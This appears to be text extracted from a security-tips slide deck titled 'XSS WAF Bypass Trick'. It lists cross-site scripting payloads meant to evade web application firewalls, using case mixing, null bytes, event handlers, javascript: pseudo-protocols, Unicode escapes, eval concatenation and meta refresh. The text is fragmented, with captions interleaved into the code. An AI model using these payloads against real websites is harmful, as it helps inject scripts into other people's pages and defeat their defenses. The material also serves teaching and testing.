WAF Bypass
WAF Bypass
WAF Bypass
www.spinthehack.in
Watch here
▪ Basic Modification
<script>alert(1)</script>
Try lowercase or
<ScRipT>alert(1)</sCriPt> uppercase letters
in between or add
<%00script>alert(1)</script> %00 to bypass
<script>al%00ert(1)</script> alert word
restriction.
XSS WAF Bypass Trick
www.spinthehack.in
Watch here
Trying to Change
<iNpUt type="text" name="input" Lower case and
value="><script>alert(1)</script> Upper case can
also work
Watch here
<input	type="text" name="input"
Try replacing the
value="><script>alert(1)</script> space or writing
any HTML values
<input
type="text" name="input" between tags
value="><script>alert(1)</script>
<input
type="text" name="input"
value="><script>alert(1)</script>
Watch here
▪ Event Handlers
<input >
<audio src="new.mp3"
> These
alternatives can
<video src="new.mp4" also be used if it
the HTML used
here is HTML5
<svg width="200" height="100"
> XSS WAF Bypass Trick
www.spinthehack.in
Watch here
<img
Try using encoded
values to Bypass
<img
>
Watch here
By using extra
brackets the
system can be
<<script>alert(1)//<</script> tricked, and by
using double slash
it comments out
the extra bracket
on closing tag
Open Bracket at
<input the end could also
help to bypass
Try using
different
«input > brackets
Try using
®input different
Characters
XSS WAF Bypass Trick
www.spinthehack.in
Watch here
▪ Psuedo Protocols
<a href="https://www.google.com">Click Here</a>
It’s a hyperlink where a user goes from one page to
another with just one click
<img src=javascript:alert(1)>
<form action=javascript:alert(1)>
Other attributes
<object data=javascript:alert(1)> also can be used
that takes URL as
a value
<button
formaction=javascript:alert(1)>
<video src=javascript:alert(1)>
XSS WAF Bypass Trick
www.spinthehack.in
Watch here
Escaping character
<script>var a = '\\'; alert(1); // can also be helpful
Using Unicode
<script>a\u006cert(1)</script> Characters like this
can help
XSS WAF Bypass Trick
www.spinthehack.in
Watch here
This function
eval('1 + 1') evaluate to 2
if the function is
<script>eval('al' + blocked then some
actual characters
'ert(1)')</script> can work
Watch here
<meta http-equiv="refresh"
content="0;url=javascript:alert(1);">
Watch here
Watch here
<script>alert(1)</script>